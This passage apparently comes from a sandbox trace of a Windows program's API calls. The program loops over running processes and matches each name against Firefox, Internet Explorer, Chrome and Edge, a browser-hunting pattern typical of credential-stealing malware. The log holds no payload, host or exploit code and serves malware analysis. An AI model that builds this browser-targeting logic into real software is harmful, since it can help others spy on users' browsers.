(in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.808] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0236.808] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0236.808] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0236.808] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.808] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0236.808] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0236.808] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0236.808] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.809] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0236.809] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0236.809] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0236.809] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.809] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0236.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0236.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0236.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0236.810] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0236.810] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0236.811] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0236.811] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0236.811] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0236.811] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0236.811] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0236.811] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0236.812] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0236.812] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0236.812] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0236.812] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0236.812] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0236.812] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0236.812] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0236.812] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0236.813] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0236.813] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0236.813] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0236.813] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0236.813] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0236.813] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0236.813] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0236.813] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0236.814] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0236.814] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0236.814] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0236.814] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0236.814] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0236.815] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0236.815] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0236.815] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0236.815] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0236.815] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0236.815] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0236.815] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0236.816] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0236.816] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0236.816] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0236.816] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0236.816] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0236.816] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0236.816] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0236.816] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0236.817] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0236.817] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0236.817] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0236.817] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0236.817] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0236.817] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0236.817] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0236.817] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0236.818] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0236.818] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0236.818] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0236.818] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0236.818] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0236.818] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0236.819] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0236.819] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0236.819] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0236.819] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0236.819] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0236.819] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0236.820] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0236.820] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0236.820] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0236.820] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0236.820] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0236.820] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0236.820] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0236.820] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0236.821] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0236.821] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0236.821] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0236.821] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0236.821] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0236.821] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0236.821] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0236.821] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0236.822] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0236.822] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0236.822] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0236.822] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.822] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0236.822] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0236.822] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0236.823] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.823] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.823] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.823] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.823] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.824] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0236.824] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0236.824] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0236.824] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.824] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.824] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.824] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.824] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0236.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0236.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0236.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.825] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.825] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.825] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.825] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.826] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0236.826] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0236.826] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0236.826] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0236.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0236.826] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0236.827] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.827] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.827] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.827] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.827] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.828] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.829] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.829] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.829] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.829] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0236.829] CloseHandle (hObject=0xd4) returned 1 [0236.829] Sleep (dwMilliseconds=0x3e8) [0237.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0237.840] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.841] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0237.841] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0237.841] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0237.841] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0237.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.841] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0237.841] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 